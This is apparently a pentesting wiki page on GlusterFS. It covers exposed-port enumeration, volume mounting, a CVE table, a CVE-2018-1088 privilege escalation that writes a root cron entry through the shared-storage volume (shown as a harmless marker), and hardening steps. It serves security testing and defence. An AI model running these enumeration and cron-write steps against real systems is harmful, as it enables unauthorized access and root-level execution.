24007-24008-24009-49152-pentesting-glusterfs.md (8142B)
1 --- 2 title: "24007-24008-24009-49152 - Pentesting GlusterFS" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 24007-24008-24009-49152 - Pentesting GlusterFS 14 15 ## Basic Information 16 17 **GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. Gluster documentation calls for management ports **24007–24008** and brick ports that historically started at **49152** (older deployments used **24009** onward). From Gluster 10, brick ports are selected within the configured `base-port` to `max-port` range rather than simply incremented.<sup>[[7]](#references)</sup> 18 19 ```text 20 PORT STATE SERVICE VERSION 21 24007/tcp open glusterd GlusterFS (RPC) 22 49152/tcp open gluster-brick SSL (TLS optional) 23 ``` 24 25 > Port 24007 can identify `glusterd` even when a probed node does not itself host a brick for the target volume. Treat management-plane exposure as a separate finding from volume access. 26 27 ## Enumeration 28 29 Install the client utilities on your attacking box: 30 31 ```bash 32 sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu 33 ``` 34 35 1. **Peer discovery & health** 36 37 ```bash 38 # Test whether the exposed management plane returns peer state 39 gluster --remote-host 10.10.11.131 peer status 40 ``` 41 42 2. **Volume reconnaissance** 43 44 ```bash 45 # Retrieve the list of all volumes and their configuration 46 gluster --remote-host 10.10.11.131 volume info all 47 ``` 48 49 3. **Mount an accessible volume** 50 51 ```bash 52 sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster 53 ``` 54 55 If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side. Common issues are: 56 57 * TLS enforcement (`option transport.socket.ssl on`) 58 * Address based access control (`option auth.allow <cidr>`) 59 60 ### Certificate troubleshooting 61 62 In an authorized lab, obtain the following files from a provisioned client and place them in the paths expected by that test client. A private key is sensitive; do not copy production credentials outside the agreed scope.<sup>[[8]](#references)</sup> 63 64 ```text 65 /etc/ssl/glusterfs.pem 66 /etc/ssl/glusterfs.key 67 /etc/ssl/glusterfs.ca 68 ``` 69 70 --- 71 72 ## Version-specific vulnerabilities 73 74 The affected versions and impacts below come from the cited CVE records and vendor advisory; distribution backports may change package-level status.<sup>[[2]](#references)[[3]](#references)[[6]](#references)</sup> 75 76 | CVE | Affected versions | Impact | Notes | 77 |-----|-------------------|--------|-------| 78 | **CVE-2022-48340** | GlusterFS 11.0 in the CVE record | Use-after-free in `dht_setxattr_mds_cbk` | Network-reachable denial of service; consult the distribution advisory for patched packages. | 79 | **CVE-2023-26253** | GlusterFS 11.0 in the CVE record | Stack buffer over-read in the FUSE notify path | Network-triggerable denial of service in affected deployments. | 80 | **CVE-2018-1088** | GlusterFS 3.x snapshot scheduler | Symlink-based write into a root cron file through shared storage | Privilege escalation when the vulnerable snapshot-scheduler setup exists. | 81 82 Do not infer affected ranges or RCE from a CVE title alone. Check `gluster --version` on every node, identify packaged backports, and compare with the CVE and distribution advisory.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup> 83 84 ### Assessing `gluster_shared_storage` 85 86 `gluster_shared_storage` is a special volume used by features such as geo-replication and snapshot scheduling. If it is exposed to unauthorized clients, mount it read-only first and inspect its actual contents and consumers. Do not assume a universal root-execution hook.<sup>[[4]](#references)</sup> 87 88 ```bash 89 # 1. Attempt a read-only mount of the shared-storage volume 90 mkdir /tmp/gss 91 sudo mount -t glusterfs -o ro 10.10.11.131:/gluster_shared_storage /tmp/gss 92 93 # 2. Enumerate files, ownership, ACLs, and references without modifying them 94 find /tmp/gss -xdev -printf '%M %u:%g %p\n' 95 ``` 96 97 #### Historical snapshot-scheduler escalation (CVE-2018-1088) 98 99 The useful privilege-escalation primitive in older GlusterFS is **not** a cluster-wide `hooks/1/start/post` directory. In an affected 3.x snapshot-scheduler setup, `snap_scheduler.py init` created `/etc/cron.d/glusterfs_snap_cron_tasks` as a symlink to `glusterfs_snap_cron_tasks` in the shared volume. A client able to mount that volume read/write could therefore control a root-parsed cron file.<sup>[[6]](#references)</sup> 100 101 An earlier draft also suggested checking `/ss_bricks/` when `hooks/1/` was absent. That path is retained as a historical filesystem-search hint, but no documented version mapping or automatic execution behavior was found; inspect ownership and consumers instead of assuming that files placed there execute. 102 103 Check the server-side preconditions first: 104 105 ```bash 106 gluster volume get all cluster.enable-shared-storage 107 readlink -f /etc/cron.d/glusterfs_snap_cron_tasks 108 ls -l /etc/cron.d/glusterfs_snap_cron_tasks 109 ``` 110 111 For an explicitly authorized, disposable vulnerable lab, a non-destructive validation entry can create a marker rather than a reverse shell: 112 113 ```bash 114 # Remount read/write only after confirming the exact vulnerable lab setup. 115 sudo mount -o remount,rw /tmp/gss 116 printf '* * * * * root /usr/bin/touch /tmp/ht-gluster-cve-2018-1088\n' | \ 117 sudo tee /tmp/gss/glusterfs_snap_cron_tasks 118 ``` 119 120 The test mutates a root cron source. Remove the entry immediately after validation; patched releases changed the shared-storage access controls, and current deployments should not be assessed with this historical assumption.<sup>[[6]](#references)</sup> 121 122 ### CVE-2023-26253 testing note 123 124 The flaw is in GlusterFS 11.0's FUSE notify handling. A generic short XDR record sent to `glusterd` is not a valid reproducer. Use the upstream issue's matching client/server setup in an isolated lab and monitor the affected FUSE client process.<sup>[[3]](#references)</sup> 125 126 --- 127 128 ## Hardening & Detection 129 130 * **Upgrade** to a vendor-supported package. Upstream 11.2 is the newest published GitHub release at the time of this review, but downstream support and backports determine the appropriate production version.<sup>[[5]](#references)</sup> 131 * Enable **TLS** on both client and server sides for the volume, provision trusted certificates, and restrict certificate identities with `auth.ssl-allow` where appropriate:<sup>[[8]](#references)</sup> 132 133 ```bash 134 gluster volume set <vol> client.ssl on 135 gluster volume set <vol> server.ssl on 136 gluster volume set <vol> auth.ssl-allow <certificate-identity> 137 ``` 138 * Restrict clients with CIDR lists: 139 140 ```bash 141 gluster volume set <vol> auth.allow 10.0.0.0/24 142 ``` 143 * Expose management port 24007 only on a **private VLAN** or through SSH tunnels. 144 * Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`). 145 146 --- 147 148 ## References 149 150 - [1] [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security) 151 - [2] [NVD — CVE-2022-48340](https://nvd.nist.gov/vuln/detail/CVE-2022-48340) 152 - [3] [GlusterFS issue 3954 — CVE-2023-26253](https://github.com/gluster/glusterfs/issues/3954) 153 - [4] [Gluster documentation — Geo-replication and shared storage](https://docs.gluster.org/en/main/Administrator-Guide/Geo-Replication/) 154 - [5] [GlusterFS upstream releases](https://github.com/gluster/glusterfs/releases) 155 - [6] [Red Hat — CVE-2018-1088 shared-storage snapshot-scheduler escalation](https://access.redhat.com/articles/3414511) 156 - [7] [Gluster documentation — Client and brick ports](https://docs.gluster.org/en/latest/Administrator-Guide/Setting-Up-Clients/) 157 - [8] [Gluster documentation — TLS setup and certificate authorization](https://docs.gluster.org/en/v3/Administrator%20Guide/SSL/)